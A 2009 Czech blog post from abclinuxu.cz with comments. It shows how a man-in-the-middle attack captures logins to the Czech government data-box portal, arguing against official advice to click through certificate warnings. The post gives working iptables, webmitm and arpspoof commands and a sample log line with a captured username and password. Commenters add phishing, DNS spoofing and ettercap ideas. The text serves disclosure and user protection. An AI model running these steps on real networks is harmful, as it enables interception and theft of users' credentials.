abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
dnes 01:11 | IT novinky

V říjnu loňského roku společnost Google představila hráčům počítačových her Project Stream umožňující streamování AAA her do webového prohlížeče Chrome. Včera na konferenci GDC 2019 (Game Developers Conference) společnost Google oficiálně představila (YouTube) pokračování projektu – herní platformu Stadia. V Čechách a na Slovensku je služba Stadia zatím nedostupná.

Ladislav Hagara | Komentářů: 0
včera 23:11 | Nová verze

Byla vydána Java 12 / JDK 12. Nových vlastností (JEP - JDK Enhancement Proposal) je 8. Nová Java / JDK vychází každých 6 měsíců.

Ladislav Hagara | Komentářů: 0
včera 22:55 | Nová verze

Byla vydána verze 3.13 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Přehled změn v příslušném seznamu. Řešena je také celá řada bezpečnostních chyb.

Ladislav Hagara | Komentářů: 0
včera 22:11 | Pozvánky

Březnový pražský sraz spolku OpenAlt se koná již tento čtvrtek – 21. 3. 2019 od 18:00 v Šenkýrně Hlubina (Lidická 37, Praha 5). Sejdeme se zase u dobrého piva a popovídáme si o tématech jako umění a technologie, IoT, CNC, svobodný software, hardware a další hračky. Pro zájemce budou tentokrát k dispozici i nějaké samolepky s GNU/Linuxovou tématikou.

xkucf03 | Komentářů: 0
včera 16:44 | Nová verze

Byl vydán Mozilla Firefox 66.0. Přehled novinek v poznámkách k vydání a na stránce věnované vývojářům. Nová verze řeší například problém s poskakováním obsahu, umí zabránit stránkám v automatickém přehrávání zvuků, přináší novou uvítací stránku anonymního prohlížení nebo zobrazuje podrobnější informace o neplatném certifikátu.

Ladislav Hagara | Komentářů: 0
včera 09:22 | IT novinky

Společnost NVIDIA představila (YouTube) jednodeskový počítač Jetson Nano Developer Kit s podporou CUDA. Koupit jej lze za 99 dolarů. Současně byl představen robot JetBot, stačí si jej vytisknout na 3D tiskárně a Jetson Nano do něj vložit.

Ladislav Hagara | Komentářů: 2
včera 01:22 | Nová verze

Po 13 měsících vývoje od vydání verze 1.20 byla vydána nová verze 1.22 grafického prostředí MATE (Wikipedie). Přehled nových vlastností a vylepšení v poznámkách k vydání. Zdůraznit lze podporu Waylandu.

Ladislav Hagara | Komentářů: 2
18.3. 19:55 | Komunita

Neziskové technologické konsorcium Linux Foundation minulý týden rozšířilo seznam svých projektů. Novinkou je CHIPS Alliance a Continuous Delivery Foundation (CDF). Spojením Node.js Foundation a JS Foundation vznikla OpenJS Foundation. Představena byla také platforma CommunityBridge nebo Red Team Project.

Ladislav Hagara | Komentářů: 0
18.3. 18:11 | IT novinky

Neziskové průmyslové konsorcium Khronos Group vydalo verzi 0.90 specifikace OpenXR (Wikipedie), tj. standardu specifikujícího přístup k platformám a zařízením pro XR, tj. platformám a zařízením pro AR (rozšířenou realitu) a VR (virtuální realitu). Společnost Collabora současně představila open source implementaci OpenXR s názvem Monado. Videoukázka na YouTube.

Ladislav Hagara | Komentářů: 0
18.3. 13:55 | Nová verze

Byla vydána verze 3.32 poštovního klienta Geary (Wikipedie). Změněno bylo číslování verzí. Předchozí verze byla 0.13. Nově bude číslování verzí stejné jako u GNOME.

Ladislav Hagara | Komentářů: 7
Kolik balíčků (v tisících) máte nainstalovaných na svém systému?
 (4%)
 (13%)
 (34%)
 (30%)
 (19%)
 (3%)
 (2%)
 (1%)
 (3%)
Celkem 211 hlasů
 Komentářů: 17, poslední včera 11:30
Rozcestník

Dat. schránky podruhé - nebezpečnostní upozornění

3.7.2009 15:24 | Přečteno: 4789× | Datové schránky | poslední úprava: 9.7.2009 19:36

Volbou přidání certifikátů k důvěryhodným certifikátům či pokračováním na stránku ISDS nevzniká žádné bezpečnostní riziko. Nebo vzniká?

slibovaný návod na arpspoofing v druhé polovině blogpostu

Na datoveschranky.info je hned na první stránce napsáno, že pokud nás při toulkách po portálu zastihne upozornění o neověřitelném certifikátu, máme jej vesele ignorovat a odkliknout. Zajímavé je, že málokoho napadne možné bezpečnostní riziko takového jednání. I sám Pan Ředitel ve včerejší zábavní estrádě prokázal, že má ohledně počítačové bezpečnosti mnohé mezery. A znáte to s tou kovářovic kobylou?

Pojďme si tedy ukázat, co se může stát, když bude uživatel bezhlavě odklikávat OK. Dostat se někomu do datové schránky není zas tak složité...

Cílem článku je především demonstrace, jak snadný může být man-in-the-middle útok. Nemusím doufám upozorňovat, že neručím za žádné problémy vzniklé aplikací zde popisovaných postupů. Nevhodné použití popisovaných programů může vést až k rozpadu vaší sítě, takže si dávejte bacha a zkoušejte si to radši jenom někde, kde to nikomu nevadí. Zneužití cizí DS je pochopitelně trestné.


Neumím efektně stříhat video, takže si to asi Mrkva bude muset natočit sám.

Úvaha na začátek

Předpokládám, že tušíte, jak funguje HTTPS a podepisování certifikátů. Také byste měli alespoň zhruba tušit, jak probíhá komunikace v ethernetových sítích a tak...

Nejdřív na svém počítači rozjedeme transparentní proxy, potom přes něj přesměrujeme komunikaci počítače oběti, podvrhneme vlastní certifikát a odposlechneme heslo. Jak prosté, milý Watsone.

Co budeme potřebovat

Náš počítač je v ethernetové síti realizované switchem, který neumí management portů (většina levnějších switchů), nebo ho nemá nastavený (většina dražších switchů). Takže třeba na koleji na Silicon Hillu to nepůjde. Předpokládám, že na svém počítači máme roota, že známe IP adresu počítače oběti a IP gatewaye. Ze softwaru budeme potřebovat iptables, webmitm a arpspoof z balíku dsniff.

Relay

V tomto kroku si vyrobíme vlastní certifikát (self-signed) a budeme poslouchat na portech 80 a 443 a logovat veškeré požadavky, které přes nás půjdou. Dále při pokusu o komunikaci s HTTP serverem s HTTPS stáhneme jeho certifikát, našemu klientovi podstrčíme svůj certifikát a požadavky od klienta vždycky naším soukromým klíčem rozšifrujeme, poznamenáme si je do logu, zašifrujeme "pravým" certifikátem a odešleme.

#zapneme forwarding cizích paketů
echo 1 > /proc/sys/net/ipv4/ip_forward
#natlačíme do iptablů potřebná pravidla; v tabulce nat ani obecně by neměla být žádná s nimi konfliktní, kdyžtak si napřed celé iptably vyflushujte
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
#spustíme webmitm; začne si generovat certifikát - vyplníme co nejvěrohodněji vypadající údaje
webmitm
#webmitm ukončíme, zapneme logování požadavků (debug mód) a necháme ho logovat do souboru
webmitm -dd 2> soubor

Když se teď připojíme na port 80 nebo 443 počítače, jeho chování by mělo velmi připomínat proxy a v souboru by měly být všechny vyslané požadavky.

Arpspoof

Teď potřebujeme, aby zvolená oběť posílala veškerou komunikaci přes nás. Toho dosáhneme jednoduše tím, že na ni začneme křičet, že brána jsme MY. Zároveň začneme křičet na bránu, že MY jsme oběť.

arpspoof -t oběť brána
arpspoof -t brána oběť

Hotovo!

Když se oběť pokusí spojit s czebox.cz (ano, netestuji to na živé datové schránce), objeví se pochopitelně okýnko (v případě Firefoxu stránka), že jako certifikát hu, které podle instrukcí České pošty odklikne. Až se přihlásí, nám se v logu objeví řádek podobný tomuto:

option=credential&target=https%3A%2F%2Fwww.czebox.cz%2Fportal%2FISDS%2F&Ecom_User_ID=nejakejmeno&Ecom_Password=nejakeheslo&submit.x=89&submit.y=27&submit=Login

(tip: doporučuji pustit na log grep s uživatelským jménem nebo alespoň nějakým jiným dostatečně unikátním řetězcem (submit=Login), log je fakt dlouhý)

No a to je vše...

Prevence

Naimportovat si kořenový certifikát CA PostSignum a nějak si ověřit jeho SHA1sum.

Pokud to bude někdo filmovat, dejte sem pak link ;-)

Doporučený titulek pro Blesk a TV Nova: Student se naboural do systému datových schránek!

UPDATE: Pokračování

       

Hodnocení: 93 %

        špatnédobré        

Obrázky

Dat. schránky podruhé - nebezpečnostní upozornění, obrázek 1

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Vložit další komentář

3.7.2009 15:44 Václav HFechs Švirga | skóre: 26 | blog: HF | Kopřivnice
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Ještě to rozeslat mediím :). Dobrá práce!
Baník pyčo!
Jendа avatar 3.7.2009 15:55 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Už vidím, jak odborníci z Nohy slabikují men-in-d-mi-dl... Chtělo by to nějakou BFU-style tiskovku :-)
3.7.2009 15:48 CEST
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Jeste tam prihod popis, jak obeti zasleme email, neco jako "Dobry den, do datove schranky jsme vam poslali dulezite oznameni o necem, mel byste si ho precist, je to dulezite". Odkaz bude smerovat na nejakej ala phishing web trebas i s nejakou peknou UTF-8 URL a tam bude zase tvuj proxy.
Jendа avatar 3.7.2009 15:53 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Ale tak jako že je oběť blbá a skočí na phishing, za to pošta nemůže. A v .info ani .cz IDN ještě (bohudík) nefunguje.
4.7.2009 09:10 Martin
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

Máš pravdu, v .info IDN nefunguje: http://www.datovéschránky.info/

4.7.2009 22:50 CEST
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

Za phising a blbost uzivatele samozrejme posta nemuze. Ale phishing je nejjednodussi a pokud navic oficialni mista radi ignorovat varovani o neoverenem certifikatu, je to opravdu jednoduche presmerovat uzivatele na nejakou jinou stranku. Je to o hodne jednodussi na rozdil od zminovaneho prikladu s vnucenim obeti nasi GW, a navic univerzalnejsi, kdyz obet nemusi byt v nasi siti. Stejne tak DNS poisoning je o dost  slozitejsi, nez jednoduchej phishing.

Proste chtelo by to udelat co nejjednodussi ukazku, jinak budou prave ti "profesionalove" jako ve zminenem rozhovoru pouze argumentovat, ze to je slozite, ze to musi byt na stejne siti atd. Presmerovat nekoho z emailu je opravdu jednoduche a funguje to vsude.

Jendа avatar 4.7.2009 23:09 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Proste chtelo by to udelat co nejjednodussi ukazku, jinak budou prave ti "profesionalove" jako ve zminenem rozhovoru pouze argumentovat, ze to je slozite, ze to musi byt na stejne siti atd.
Jak ukázku? Jako poslat mail (s From: info@datoveschranky.info) a v něm mít odkaz na falešnou stránku? A jak se proti tomu má pošta bránit?
6.7.2009 08:28 Honza Jaroš | skóre: 6 | blog: moje_strana_plotu | Bohnice
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Neradit lidem, aby ignorovali varování před neznámým certifikátem ;-)
6.7.2009 08:59 Filip Jirsák | skóre: 67 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Tak ony jsou celé Datové schránky takový atentát na elektronický podpis a infrastrukturu veřejných klíčů (např. elektronický podpis nahrazují jménem a heslem), doporučení odkliknout každý certifikát, který se prohlížeči nabídne, je jenom pokračování v tomto snažení.
6.7.2009 09:48 petr_p | skóre: 59 | blog: pb
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Přidat lze aféru s evropskými čipovými pasy. Zajímalo by mě, jestli jsou tak blbí nebo navedení.
6.7.2009 10:15 Honza Jaroš | skóre: 6 | blog: moje_strana_plotu | Bohnice
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Těch věcí je víc, třeba Karta Pražana (nyní Opencard) s nezměněnými továrními klíči. Tehdy bylo jediným výsledkem odklizení tehdejšího šéfa odboru informatiky (kterému se v té době podařilo jeho odbor téměř celý zlikvidovat a převést jeho funkce na externí firmy) o post níže, nicméně nadále dělal v podstatě totéž co předtím. Nyní ho už strana převelela jinam, takže momentálně škodí na vedoucí funkci v České televizi...
6.7.2009 11:10 Filip Jirsák | skóre: 67 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Tam jde o co?
6.7.2009 12:16 petr_p | skóre: 59 | blog: pb
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Tam jde o bezkontaktní RFID, které lze z principu odposlouchávat, kde z „technických“ důvodů nejsou digitální podpisy na hranicích kontrolovány (což umožňuje klonování pasů) a kde jsou používány slabé algoritmy na ochranu citlivých údajů (které tak lze snadno získat, přestože by k nim měl mít přístup jen hraniční úředník). V roce 2006 byly tyto problémy předvedeny v jedné dánské televizi a na konferenci Black Hat v Las Vegas. Mám dojem, že se někomu i podařilo získat data nějakého unijního pohlavára. Výsledek je, že celý projekt byl de facto pozastaven. De jure sice státy mají povinnost se držet harmonogramu (prozatím jsou povinné otisky a obličeje zakódované do čárových kódu), ale další postup (používání čipů) prakticky nikdo (kromě Británie) hromadně ještě nenasadil a záležitost se oddaluje. Jako určitý seznam literatury lze použít odkazy z kapitoly Attacks na anglické Wikipedii o Biometric passport.
3.7.2009 16:42 Kvakor
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Nebo se může využít nějaká díra v mailovém klientovy či browseru, skrz kterou jde provést libovolný kód útočníka (a že jich ve Windows bylo - většina záplat řešila právě takové chyby), potom stačí například upravit soubor hosts, takže oběť nepozná, že se připojuje úplně někam jinam.

Ještě, že tohle pokročilejší antiviry kontrolují ...
Luk avatar 3.7.2009 16:47 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Nebo existuje DNS spoofing/pharming (podvržení DNS odpovědí). DNSSec se prakticky ještě vůbec nepoužívá.
LinuxMarket - linuxový e-shop | LinuxEXPRES - linuxový magazín | OpenOffice.cz - portál uživatelů OpenOffice/LibreOffice
Jendа avatar 3.7.2009 17:57 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Nebo se může využít nějaká díra v mailovém klientovy či browseru, skrz kterou jde provést libovolný kód útočníka (a že jich ve Windows bylo - většina záplat řešila právě takové chyby), potom stačí například upravit soubor hosts, takže oběť nepozná, že se připojuje úplně někam jinam.
Nebo rovnou nainstalovat keylogger, že. Zase - za děravý browser klienta nemůže pošta.
Salamek avatar 3.7.2009 15:48 Salamek | skóre: 22 | blog: salamovo
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
už to někdo spáchal natočil ? :-D , já bych to udělal ale nechci aby mě pak nějakej debil zabásnul místo toho aby to spravili :-D
Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
Jendа avatar 3.7.2009 15:51 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Už jsem to řešil :-)
Salamek avatar 3.7.2009 15:55 Salamek | skóre: 22 | blog: salamovo
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
aha, tak to jo :-), já jdu ku*vit :-D
Skutečně nemám v plánu zničit Microsoft. Bude to jen zcela neúmyslný vedlejší efekt.
Luk avatar 3.7.2009 16:16 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Naimportovat si kořenový certifikát CA PostSignum a nějak si ověřit jeho SHA1sum.
Vyžádal jsem si již včera vyjádření PostSignum QCA, jak certifikát bezpečně ověřit. Pokud nedostanu uspokojivou odpověď, podám podnět k ministerstvu vnitra* pro porušení § 6, odst. 1, písm. a) zákona 227/2000 Sb. () Za to lze podle § 18a, odst. 6, uložit pokutu do 10 milionů Kč. Podle certifikační politiky kořenového certifikátu by mělo jít nechat si na "registračních autoritách" (pracovištích ČP) nakopírovat kořenový certifikát na médium. Toto také každému doporučuji, protože je to jediný bezpečný způsob.

*Problém je v tom, že Česká pošta s.p. patří pod ministerstvo vnitra. Proto bude MV kontrolovat případné porušení zákona ve své vlastní organizaci, čili nemusí mít zájem na tom, aby se porušení zákona prokázalo.
LinuxMarket - linuxový e-shop | LinuxEXPRES - linuxový magazín | OpenOffice.cz - portál uživatelů OpenOffice/LibreOffice
3.7.2009 16:32 Kvakor
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Nedostane každý při zřízení oné schránky nějaké papíry? Pak by se SHA1sum mohla otisknout právně v nich, spolu s popisem, jak ověřit, že certifikát není podvržený - ten, kdo podvrne vlastní certifikát, může stejným způsobem podvrhnout i kořenový certifikát CA.
Luk avatar 3.7.2009 16:42 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Nedostane každý při zřízení oné schránky nějaké papíry? Pak by se SHA1sum mohla otisknout právně v nich, spolu s popisem, jak ověřit, že certifikát není podvržený
Byla by to samozřejmě dobrá cesta, ale nedělám si moc velké iluze, že se tam fingerprint dnes uvádí (téměř jistě ne), ani že to tam jen tak sami od sebe začnou uvádět. Kdyžtak je bude potřeba k tomu dokopat (nebo k jiné srovnatelně bezpečné a pohodlné cestě). Nicméně primární by mělo být poskytnutí přes pracoviště ČP, jak je to uvedeno v jejich politice. Jsem zvědav, co mi odpoví (protože by měli odpovědět to, co je v politice uvedeno, případně na ni odkázat). Pak zkusím přijít na poštu (kam stejně musím, protože mi před časem propadl elektronický podpis - zapomněl jsem ho včas prodloužit) a nechat si nakopírovat kořenový certifikát. Doufám, že se nebudou tvářit, že nevědí, co po nich chci. A právě, jak už jsem říkal, ať to zatím takhle dělá každý, protože certifikát získaný přes HTTP může být podvržený.
LinuxMarket - linuxový e-shop | LinuxEXPRES - linuxový magazín | OpenOffice.cz - portál uživatelů OpenOffice/LibreOffice
4.7.2009 22:54 CEST
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

Hmmm, kdyz jsem sepisoval smlouvu na inet bakovnictvi do KB, tak jsem mel ve smlouve i nejakej checksum - nevim ted, jestli tehdy jeste MD5 nebo uz i SHA1, ale kontroloval jsem to, ale navic KB to ma podepsany verisignem. Mozna to stejnym zpusobem maji i datovyschranky.

9.7.2009 14:10 rastik
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

Každý dostane u PostSignum společně s certifikátem i kořenové certifikáty na flashku. Tak předpokládám, že je možné je získat i na vyžádání, bez žádosti o vytvoření certifikátu.

3.7.2009 16:43 Roman Schulz | skóre: 8 | Brno
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Já myslím, že to je vážná chyba. Postsignum se mělo dávno snažit, aby jejich certifikát byl v nejčastějších prohlížečích (IE, Opera, Firefox..) automaticky
3.7.2009 17:06 12345 | skóre: 41 | blog:
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Řekl bych, že tou opravdu vážnou chybou je, že někdo oficiálně doporučuje bezmyšlenkovité odklikávání neznámých certifikátů. Být zaměstnavatelem, tak bych se s autorem takového doporučení nejraději rozloučil.
otasomil avatar 3.7.2009 19:21 otasomil | skóre: 37 | blog: puppylinux
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

A je tu duvod ji rozebirat.

Mj jestli potkavate p Koupeho (osobnosti.cz)  tak ho  ode mne pozdravujte.

Dekuji

K čemu hudba, která nevede k extázi... Stop MDMA !!! Už je to víc jak 50 let: http://buxlrerulbak7g3e.onion/
xkucf03 avatar 4.7.2009 10:10 xkucf03 | skóre: 47 | blog: xkucf03
Rozbalit Rozbalit vše Certifikáty v prohlížečích

Dostat do prohlížečů další certifikační autoritu je prakticky nemožné, zvlášť pokud se týká jen jednoho státu. Podobně hezké by bylo, kdyby se tam dostala např. CA CESNETu, ale to je také nereálné.

Řešením tedy je, mít bezpečný server s HTTPS certifikátem podepsaným nějakou důvěryhodnou* autoritou a umožnit lidem si z něj stahovat certifikáty českých CA.

*) uznávanou v prohlížečích. A zároveň šířit otisk toho certifikátu i jinou cestou.

Mám rád, když se lidé přou, znamená to, že vědí, co dělají, a že mají směr. Frantovo.cz, SQL-Výuka.cz, Nekuřák.net
4.7.2009 13:52 Filip Jirsák | skóre: 67 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Certifikáty v prohlížečích
I.CA svůj kořenový certifikát nedávno do Windows dostala (ovšem musel být vydán opět nový, ten původní by asi z nějakého důvodu neprošel).
Michal Wirth avatar 3.7.2009 16:47 Michal Wirth | skóre: 26
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Pokud se s tim nechcete moc pytlikovat, tak sahnete po ettercap. Umi to same na cca 3-5 kliknuti. Zkousel jsem to a moc pekne to funguje. :-) Navic umi i spoustu dalsich uzitecnych veci.
Důležité se časem stává absurdním, absurdní se časem mění v důležité.
3.7.2009 17:46 Milan Jurik | skóre: 21 | blog: Komentare | Ova
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
"Poznámka: Za (dostatečně) důvěryhodný můžete považovat certifikát autority, který vám osobně předá operátorka na pracovišti České pošty. Certifikáty autorit jsou vám automaticky předávány spolu s vydaným certifikátem."

Citace ze stranek PostSignum QCA
Luk avatar 3.7.2009 18:00 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
To ano (jak jsem si teď ověřil, opravdu jsem tehdy kořenový certifikát obdržel), ale zřízení datové schránky nemusí znamenat pořízení elektronického podpisu a tedy ani návštěvu ČP. Proto kdo tam nepůjde kvůli podpisu, bude tam muset zajít explicitně pro kořenový certifikát.
LinuxMarket - linuxový e-shop | LinuxEXPRES - linuxový magazín | OpenOffice.cz - portál uživatelů OpenOffice/LibreOffice
otasomil avatar 3.7.2009 17:55 otasomil | skóre: 37 | blog: puppylinux
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

K tomu bych si dovolil dodat modifikovanou hlasku z jednoho ceskeho filmu:

Hlavne o tom zvante d******e, at mame na krku IT kriminalku.

K čemu hudba, která nevede k extázi... Stop MDMA !!! Už je to víc jak 50 let: http://buxlrerulbak7g3e.onion/
Jendа avatar 3.7.2009 17:58 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Ten film neznám, ale... jak jinak než zveřejněním bys je chtěl donutit k opravě?
otasomil avatar 3.7.2009 18:41 otasomil | skóre: 37 | blog: puppylinux
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

Vsak jo. Vase ciny jsou chvalihodne.

Je treba hledat bezpecnostni problemy.

K čemu hudba, která nevede k extázi... Stop MDMA !!! Už je to víc jak 50 let: http://buxlrerulbak7g3e.onion/
Luk avatar 3.7.2009 18:05 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
O tom je potřeba žvanit. Jinak se to všechno hezky zamete pod koberec a všichni se budou tvářit, že je všechno v pořádku. A kriminálku bychom měli upozornit naopak my, protože inkriminované doporučení na serveru www.datoveschranky.info je podle mého názoru na hranici (nebo už za ní) trestného činu, jak už jsem nedávno uvedl.
LinuxMarket - linuxový e-shop | LinuxEXPRES - linuxový magazín | OpenOffice.cz - portál uživatelů OpenOffice/LibreOffice
Jendа avatar 3.7.2009 18:34 Jendа | skóre: 75 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Hele, a napadlo vás vůbec někoho, že to pan ředitel nikomu neprozradil, a tudíž by se hodilo dát jim o tom vědět? Třeba o tom fakt ještě nevědí. Poslal jsem na dotazy zavináč datoveschranky info tento mail:
Předmět: Zavádějící tvrzení na datoveschranky.info

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dobrý den,
na adrese http://datoveschranky.info/ je uvedeno velmi zavádějící
tvrzení, jehož dodržení může ohrozit bezpečnost uživatele:

"Při pokusu o přihlášení do systému ISDS se může objevit varování,
upozorňující na problém s bezpečnostním certifikátem stránky. Toto je
způsobeno nepřítomností certifikátu ve standardní instalaci MS Windows
či jiných operačních systémů. Upozornění je nutno ignorovat; vstup na
stránku je zcela bezpečný neboť používaný certifikát je vydán
kvalifikovanou českou certifikační autoritou. Volbou přidání
certifikátů k důvěryhodným certifikátům či pokračováním na stránku
ISDS nevzniká žádné bezpečnostní riziko."

Pokud se uživatel bude těmito instrukcemi řídit, nainstaluje si
certifikát, u kterého nemůže ověřit, jestli ho opravdu vydalo
PostSignum nebo ho podvrhl útočník. Vhodnější by bylo, pokud byste
uvedli, jak si naimportovat kořenový certifikát PostSigna a ověřit
jeho integritu.
Děkuji za vyjádření,
Jan Hrach

- --
Jan Hrach
Mail: jenda {} hrach.eu
Jabber: hrachj {} abclinuxu.cz
GPG: http://ftp.hrach.eu/jenda/public.key
1D9D AC4B E964 0D1E 7F5D 6E03 B72F 6430 9FA4 F536
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkpOMj8ACgkQty9kMJ+k9TawnQCg7apv2DFC8SW+UpS6+OXPJ/mG
w6kAniPI+lyxSOYDQSCRsrbHyft9BIjW
=J1UN
-----END PGP SIGNATURE-----
otasomil avatar 3.7.2009 18:45 otasomil | skóre: 37 | blog: puppylinux
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

Tak to se tu za vsechny tesim na odpoved. Ani bych se nedivil kdyby neodpovedeli - k tomu mailu totiz neni co dodat.

 

K čemu hudba, která nevede k extázi... Stop MDMA !!! Už je to víc jak 50 let: http://buxlrerulbak7g3e.onion/
Grunt avatar 3.7.2009 23:31 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Ještě kdysi v dávných dobách jsem zveřejnil pár FW pravidel(nic čistého, to je mi jasné) pro jistý OS, který s oblibou používají ISP. Jak jsem později zjistil, tak ho používali i k různým dalším činnostem. Podstata je ta, že aniž by to klient věděl, tak komunikuje s jiným serverem než se kterým původně chtěl(Únos spojení?) jen s tím detailem, že nemá šanci to nijak rozumně zjistit, jelikož tím únoscem(man-in-the-middle) je router(IP, MAC adresy,…díky NATu všechno sedí. No prostě hnus nejzelenější). Což takhle k tomu ještě doplnit serverou část, která by logovala ty uživatelské údaje pěkně do databáze aby se mohl stát MiM(kterým už vlastně z principu je, jen si to díky vlastní neschopnosti neumí zařídit) mohl stát kterýkoliv ISP pouhým stáhnutím skriptu a použitím CTRL+C a CTRL+V. Třeba by mělo šanci to trochu zvednout nedůvěřivost v našich končinách. A ještě by tím ISPčka částečně splnili tu úžasnou vyhlášku o logování provozních údajů.
Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
Grunt avatar 3.7.2009 23:33 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
BTW: Uznávám, že mi už asi šibe riadně.
Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
belisarivs avatar 4.7.2009 08:57 belisarivs | skóre: 22 | blog: Psychobláboly
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění

Mozna je to blba otazka, ale nestoji pokus o napadeni timto zpusobem na nutnosti byt s napadenym ve stejne siti a to jeste na hubu, ktery posila data vsem a ty pak jdou zachytit treba wiresharkem, ktery prepne sitovku do promiskuitniho rezimu?

Cili, pokud jsem priojen do switche, ktery neposila vse vsem, ale jenom tomu, komu ma, tak jsem za vodou?

IRC is just multiplayer notepad.
4.7.2009 09:37 TM
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Na stejném segmentu ethernetu, případně na stejném vlanu být musíte, ale switch vám rozhodně nepomůže - viz. arpspoof, který autor využívá.
Ale ono by to šlo udělat i jinak - představte si třeba, že zlý hoch má v rukou softwarový router, přes který jde provoz od toho uživatele...může použít i jiné nástroje - stunnel apod.
Každopádně autor udeřil přesně hřebíček na hlavičku - radit lidem, aby bezhlavě odklikávali certifikát, který browser považuje za nedůvěryhodný vskutku není ideální...
thingie avatar 4.7.2009 12:23 thingie | skóre: 8
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
Jak autor popisuje, switch není překážkou, není-li dostatečně chytrý a zároveň ještě vhodně nastavený, což nebývá (obojí najednou) zvykem. Kde by člověk dneska hledal hub…
Růžové lži.
Grunt avatar 4.7.2009 12:58 Grunt | skóre: 23 | blog: Expresivní zabručení | Lanžhot
Rozbalit Rozbalit vše Re: Dat. schránky podruhé - nebezpečnostní upozornění
A pokud už to čirou náhodou nejde na druhé síťové vrstvě tak hop o vrstvu výše na ICMP Redirect. Ještě jsem nezažil systém, který by nevyhověl. Vždycky se najde něco.
Na co 64-bitů když to jde i s jedním? | 80.78.148.5 | Hack (for) free or Die Hard!
4.7.2009 13:56 Filip Jirsák | skóre: 67 | blog: Fa & Bi
